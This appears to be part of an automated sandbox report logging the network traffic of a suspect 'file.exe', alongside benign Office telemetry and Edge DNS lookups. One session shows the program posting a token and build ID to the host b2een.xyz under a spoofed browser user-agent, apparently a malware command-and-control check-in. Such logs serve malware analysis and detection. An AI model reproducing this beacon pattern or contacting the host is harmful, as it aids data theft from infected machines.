2024-11-25 10:34:01 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 25 Nov 2024 10:33:01 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_BAY x-ms-request-id: 76d4392d-a9eb-47af-b2fe-1b52abf77152 PPServer: PPV: 30 H: PH1PEPF0001B788 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 25 Nov 2024 10:34:00 GMT Connection: close Content-Length: 1276
2024-11-25 10:34:01 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	49853	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:01 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 3165 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:34:01 UTC	3165	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------FIIIIDGHJEBFBGDHDGIICont
2024-11-25 10:34:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:34:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:34:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.5	49850	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:02 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:02 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 731b5b9c-601e-0001-6b71-3cfaeb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103402Z-174c587ffdftv9hphC1TEBm29w00000005ng00000000kb5s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:02 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.5	49849	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:02 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:02 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 80a20124-101e-0046-4f43-3c91b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103402Z-15b8b599d88wn9hhhC1TEBry0g00000005s000000000gf08 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:02 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.5	49857	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:02 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:02 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: 080d0a10-601e-0050-16b6-3e2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103402Z-178bfbc474bfw4gbhC1NYCunf4000000078000000000bdm4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:02 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.5	49856	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:02 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:02 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: 19681afd-501e-005b-29d8-3ed7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103402Z-178bfbc474bscnbchC1NYCe7eg00000007d000000000an41 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:02 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.5	49855	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:02 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:02 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: 11f5d02a-c01e-008d-30bf-3e2eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103402Z-178bfbc474bq2pr7hC1NYCkfgg00000007kg000000001ecg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:02 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	49869	172.64.41.3	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 10:34:02 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-25 10:34:02 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 25 Nov 2024 10:34:02 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e80fbe64b591a40-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 10:34:02 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	49867	162.159.61.3	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 10:34:02 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-25 10:34:02 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 25 Nov 2024 10:34:02 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e80fbe68e3b437f-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 10:34:02 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 cf 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	49877	172.64.41.3	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 10:34:02 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-25 10:34:02 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 25 Nov 2024 10:34:02 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e80fbe6a8b45e71-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 10:34:02 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 04 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom))

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	49882	172.64.41.3	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 10:34:02 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	49883	162.159.61.3	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 10:34:02 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-25 10:34:03 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 25 Nov 2024 10:34:03 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e80fbe90e6fde97-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 10:34:03 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom(A)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	49884	172.64.41.3	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 10:34:02 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	49870	172.217.19.225	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

